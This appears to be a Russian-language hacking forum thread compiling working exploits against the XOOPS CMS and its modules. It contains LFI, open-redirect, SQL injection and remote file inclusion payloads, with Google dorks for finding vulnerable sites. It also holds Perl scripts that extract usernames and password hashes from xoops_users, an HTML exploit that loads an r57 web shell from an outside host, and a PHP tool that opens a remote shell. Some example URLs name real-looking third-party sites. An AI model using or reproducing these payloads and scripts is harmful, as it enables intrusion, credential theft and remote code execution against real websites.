LFI Vulnerable: XOOPS 2.0.18 Уязвимый скрипт: htdocs/install/index.php PHP: $language = 'english'; if ( !empty($_POST['lang']) ) { $language = $_POST['lang']; . . . . if ( file_exists("./language/".$language."/install.php") ) { include_once "./language/".$language."/install.php"; POST-переменная "lang" не фильтруется PoC: Code: POST /xoops-2.0.18/htdocs/install/index.php HTTP/1.0 Cookie: install_lang=english; lang=russian; PHPSESSID=p113cjpff5dkrkoka01al18kk5; dk_sid=sfa6hlhn75pobg6kqe5m8p30j1 Content-Length: 67 Accept: */* Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: localhost Content-Type: application/x-www-form-urlencoded Referer: http://localhost/xoops-2.0.18/htdocs/install/index.php lang=/../../../../../../../../boot.ini%00.html&op=start&submit=Next URL Redirection Vulnerable: XOOPS 2.0.18 Уязвимый скрипт: htdocs/user.php?xoops_redirect POST-переменная "xoops_redirect" не фильтруется PoC: Code: http://[server]/[installdir]/htdocs/user.php?xoops_redirect=http://evilsite.com
XOOPS Module Dictionary <= 0.94 Remote SQL Injection Vulnerability Code: ########################################## # # XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection # ########################################## # ##AUTHOR : S@BUN # ####HOME : http://www.milw0rm.com/author/1334 # ####MAİL : [email protected] # ########################################### # # DORK 1 : allinurl: "modules/dictionary" # # DORK 2 : allinurl: "modules/dictionary/print.php?id" # ########################################### EXPLOIT : modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/* ########################################### Dictionary Version 0.94 by nagl.ch Dictionary Version 0.91 by nagl.ch Dictionary Version 0.70 by nagl.ch ########################################### ##################S@BUN#################### ########################################### #####[email protected]##### ########################################### # milw0rm.com [2008-03-17] milw0rm.com
XOOPS Project-Recette(Recipe)2.2 SQL Injection Vulnerability SQL Injection Vulnerable: XOOPS Project-Recette(Recipe)2.2 Exploit: Code: modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/* Dork: Code: allinurl :\"modules/recipe\"
RFI Vulnerable: XOOPS Module XFsection Vuln script: modify.php PoC: Code: http://www.site.com/modules/xfsection/modify.php?dir_module=evilcode.txt? Vulnerable: XOOPS Module XT-Conteudo Vuln script: /admin/spaw/spaw_control.class.php PHP: include $spaw_root.'config/spaw_control.config.php'; include $spaw_root.'class/toolbars.class.php'; include $spaw_root.'class/lang.class.php'; PoC: Code: http://site/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=[shell]? Vulnerable: XOOPS Module Cjay Content 3 Vuln script: /admin/editor2/spaw_control.class.php PHP: include $spaw_root.'config/spaw_control.config.php'; include $spaw_root.'class/toolbars.class.php'; include $spaw_root.'class/lang.class.php'; Note: Register globals must be ON, and Magic Quotes must be OFF PoC: Code: http://site/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=[shell ]? Vulnerable: XOOPS Module icontent 1.0 Exploit: HTML: <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <title>XOOPS Module icontent v.1.0 Remote File Inclusion Exploit</title> <script language="JavaScript"> //'=============================================================================================== //'[Script Name: XOOPS Module icontent v.1.0 //'[Author : Mahmood_ali //'[S.Page : http://mirror.in.th/sourceforge.net/x/xo/xoops/xoops2-mod_icontent.zip //'=============================================================================================== //'[[V.Code]]------------------------------------------------------ //' //'include $spaw_root.'config/spaw_control.config.php'; //'include $spaw_root.'class/toolbars.class.php'; //'include $spaw_root.'class/lang.class.php'; //' //'[[V.Code]]--------------------------------------------------------- //# Tryag.Com //# ... var path="/modules/icontent/include/wysiwyg/" var adres="spaw_control.class.php" //File name var acik ="?spaw_root=" // Line 15 var shell="http://lppm.uns.ac.id/r57.txt?" // R57Shell function command(){ if (document.rfi.target1.value==""){ alert("Failed.."); return false; } rfi.action= document.rfi.target1.value+path+adres+acik+shell; // Ready rfi.submit(); // Form Submit } </script> </head> <body bgcolor="#000000"> <center> <p><b><font face="Arial" size="2" color="#FFFFFF">XOOPS Module icontent v.1.0 Remote File Inclusion Exploit</font></b></p> <p></p> <form method="post" target="getting" name="rfi" onSubmit="command();"> <b><font face="Tahoma" size="1" color="#FF0000">Target:</font><font face="Tahoma" size="1" color="#FFFF00">[http://[target]/[scriptpath]</font><font color="#00FF00" size="2" face="Tahoma"> </font><font color="#FF0000" size="2"> </font></b> <input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"></p> <p><input type="submit" value="Gonder" name="B1"><input type="reset" value="Sifirla" name="B2"></p> </form> <p><br> <iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe> </p> <b><font face="Lucida Handwriting" size="5" color="#FF0000">Mahmood_ali</font></b><p> <b><a href="http://tryag.com/cc"> <font face="Lucida Handwriting" size="5" color="#FFFFFF">TrYaG-Team</font></a></b></p> </p> </center> </body> </html> Vulnerable: XOOPS Module tsdisplay4xoops 0.1 PoC: Code: [Path]/modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2.php?xoops_url=Shell Remote SQL Injection Vulnerable: XOOPS Module Jobs <= 2.4 Code: #!/usr/bin/perl #[Script Name: XOOPS Module Jobs <= 2.4 (cid) Remote BLIND SQL Injection Exploit #[Coded by : ajann #[Author : ajann #[Contact : :( #[Dork : "inurl:/modules/jobs/" #[S.Page : http://www.jlmzone.com/ #[$$ : Free #[.. : ajann,Turkey use IO::Socket; if(@ARGV < 1){ print " [======================================================================== [// XOOPS Module Jobs <= 2.4 (cid) Remote BLIND SQL Injection Exploit [// Usage: exploit.pl [target] [// Example: exploit.pl victim.com [// Example: exploit.pl victim.com [// Vuln&Exp : ajann [======================================================================== "; exit(); } #Local variables $kapan = "/*"; $server = $ARGV[0]; $server =~ s/(http:\/\/)//eg; $host = "http://".$server; $port = "80"; $file = "/modules/jobs/index.php?pa=jobsview&cid="; print "Script <DIR> : "; $dir = <STDIN>; chop ($dir); if ($dir =~ /exit/){ print "-- Exploit Failed[You Are Exited] \n"; exit(); } if ($dir =~ /\//){} else { print "-- Exploit Failed[No DIR] \n"; exit(); } print "User ID (uid): "; $id = <STDIN>; chop ($id); $target = "-1%20union%20select%203,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),1%20from%20xoops_users%20where%20uid%20like%20".$id.$kapan; $target = $host.$dir.$file.$target; #Writing data to socket print "+**********************************************************************+\n"; print "+ Trying to connect: $server\n"; $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n"; print $socket "GET $target HTTP/1.1\n"; print $socket "Host: $server\n"; print $socket "Accept: */*\n"; print $socket "Connection: close\n\n"; print "+ Connected!...\n"; #Getting while($answer = <$socket>) { if ($answer =~ /username:(.*?)pass/){ print "+ Exploit succeed! Getting admin information.\n"; print "+ ---------------- +\n"; print "+ Username: $1\n"; } if ($answer =~ /password:(.*?)<\/b>/){ print "+ Password: $1\n"; } if ($answer =~ /Syntax error/) { print "+ Exploit Failed : ( \n"; print "+**********************************************************************+\n"; exit(); } if ($answer =~ /Internal Server Error/) { print "+ Exploit Failed : ( \n"; print "+**********************************************************************+\n"; exit(); } }
Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it PHP: ############################################# #Coded By Cr@zy_King http://coderx.org]# ############################################# use IO::Socket; if (@ARGV != 3) { print "\n-----------------------------------\n"; print "Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it\n"; print "-----------------------------------\n"; print "\n4ever Cra\n"; print "crazy_kinq[at]hotmail.co.uk\n"; print "http://coderx.org\n"; print "\n-----------------------------------\n"; print "\nKullanim: $0 <server> <path> <uid>\n"; print "Ornek: $0 www.victim.com /path 1\n"; print "\n-----------------------------------\n"; exit (); } $server = $ARGV[0]; $path = $ARGV[1]; $uid = $ARGV[2]; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80"); printf $socket ("GET %s/modules/articles/article.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/WHERE/**/uid=$uid/* HTTP/1.0\nHost: %s\nAccept: */*\nConnection: close\n\n", $path,$server,$uid); while(<$socket>) { if (/\>(\w{32})\</) { print "\nID '$uid' User Password :\n\n$1\n"; } } # Cr@zy_King # http://coderx.org # [email protected]
Solide Snake, не разу на blind не натыкался. xoops # Article Module # sql injection Code: modules/articles/article.php?id={SQL}-- +xoops_users -uname -pass example: Code: http://www.geo.pu.ru/modules/articles/article.php?id=-9999+union+select+1,2,3,4,5,6,concat(0x3a,uname,0x3a,pass),8,9,0,1,2,3,4,5,6,7,8,9,0+from+xoops_users+limit+0,1-- mega exploit : Code: #!usr/bin/perl use LWP::UserAgent; print qq( # xoops article module exploit # # coded by ph1l1ster #\n\n# Enter site:\n> ); $site = <STDIN>;chomp($site); print "\n# Enter numbers of users:\n> "; $users = <STDIN>;chomp($users); &inj; sub inj{ print "\nStarting..\n\n"; $limit = 0; while ($limit <= $users){ $url = "http://".$site."/modules/articles/article.php?id=-9999+union+select+1,2,3,4,5,6,concat(555666,0x3a,uname,0x3a,pass,0x3a,777888),8,9,10,11,12,13,14,15,16,17,18,19,20+from+xoops_users+limit+".$limit.",1--"; $client = LWP::UserAgent->new( ) or die; $answer = $client->get($url); $limit ++; if ($answer->content =~ /555666:(.*):777888/){ print $1."\n";}} print "Done!"}
XOOPS modules/easyweb/ SQL-inj Exploit Code: -555555+union+select+1,2,3,concat_ws(0x3a,uname,pass),5+from+xoops_users-- http://ofernio.ru/portal/modules/easyweb/?artid=-5+union+select+1,2,3,concat_ws(0x3a,uname,pass),5+from+xoops_users-- dOrK: inurl:/modules/easyweb/
XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit Code: #!/usr/bin/php -q <?php /**************************************************************** * XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit * * by athos - staker[at]hotmail[dot]it * * http://xoops.org * * * * thanks to s3rg3770 and The:Paradox * * * * works with register globals on * * note: this vuln is a remote php code execution * * * * Directory (xoops_lib/modules/protector/) * * onupdate.php?mydirname=a(){} [PHP CODE] function v * * oninstall.php?mydirname=a(){} [PHP CODE] function v * * notification.php?mydirname=a(){} [PHP CODE] function v * ****************************************************************/ error_reporting(0); list($cli,$host,$path,$num) = $argv; if ($argc != 4) { print "\n+--------------------------------------------------------------+\n"; print "\r| XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit |\n"; print "\r+--------------------------------------------------------------+\n"; print "\rby athos - staker[at]hotmail[dot]it / http://xoops.org\n"; print "\rUsage: php xpl.php [host] [path]\n\n"; print "\rhost + localhost\n"; print "\rpath + /XOOPS\n"; exit; } exploit(); function exploit() { global $num; if ($num > 3) { die("\n$num isn't a valid option\n"); } else { yeat_shell(); } } function yeat_shell() { while (1) { echo "yeat[php-shell]~$: "; $exec = stripslashes(trim(fgets(STDIN))); if (preg_match('/^(exit|--exit|quit|--quit)$/i',$exec)) die("\nExited\n"); if (preg_match('/^(help|--help)$/i',$exec)) echo("\nExample: uname -a\n"); if (preg_match('/^(about|--about)$/i',$exec)) echo("\nstaker[at]hotmail[dot]it\n"); print data_exec($exec); } } function data_exec($exec) { global $host,$path,$num; if ($num == 1) { $urlex = "/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}"; } if ($num == 2) { $urlex = "/xoops_lib/modules/protector/notification.php?mydirname=a(){}"; } if ($num == 3) { $urlex = "/xoops_lib/modules/protector/oninstall.php?mydirname=a(){}"; } $exec = urlencode($exec); $data .= "GET /{$path}/{$urlex}{$exec}function%20v HTTP/1.1\r\n"; $data .= "Host: {$host}\r\n"; $data .= "User-Agent: Lynx (textmode)\r\n"; $data .= "Connection: close\r\n\r\n"; $html = data_send ($host,$data); return $html; } function data_send ($host,$data) { if (!$sock = @fsockopen($host,80)) { die("Connection refused,try again!\n"); } fputs($sock,$data); while (!feof($sock)) { $html .= fgets($sock); } fclose($sock); return $html; } (c)milw0rm.com
LFI[Xoops 2.2.6] Под руку попалась эта версия. Смотри исходники system/admin.php: Code: <?php if (isset($_POST['fct'])) { $fct = trim($_POST['fct']); } if (isset($_GET['fct'])) { $fct = trim($_GET['fct']); } $xoopsOption['pagetype'] = "admin"; include "../../mainfile.php"; if (!$xoopsUser) { redirect_header(XOOPS_URL."/user.php", 3, _AD_NORIGHT); } include XOOPS_ROOT_PATH."/include/cp_functions.php"; include_once XOOPS_ROOT_PATH."/modules/system/constants.php"; $error = false; if (isset($fct) && $fct != '') { if (file_exists(XOOPS_ROOT_PATH."/modules/system/admin/".$fct."/xoops_version.php")) { if (file_exists(XOOPS_ROOT_PATH."/modules/system/language/".$xoopsConfig['language']."/admin/".$fct.".php")) { include XOOPS_ROOT_PATH."/modules/system/language/".$xoopsConfig['language']."/admin/".$fct.".php"; } elseif (file_exists(XOOPS_ROOT_PATH."/modules/system/language/english/admin/".$fct.".php")) { ... } include XOOPS_ROOT_PATH."/modules/system/admin/".$fct."/xoops_version.php"; ... Експлоит: Code: http://site.com/modules/system/admin.php?fct=../../../../../../../etc/passwd%00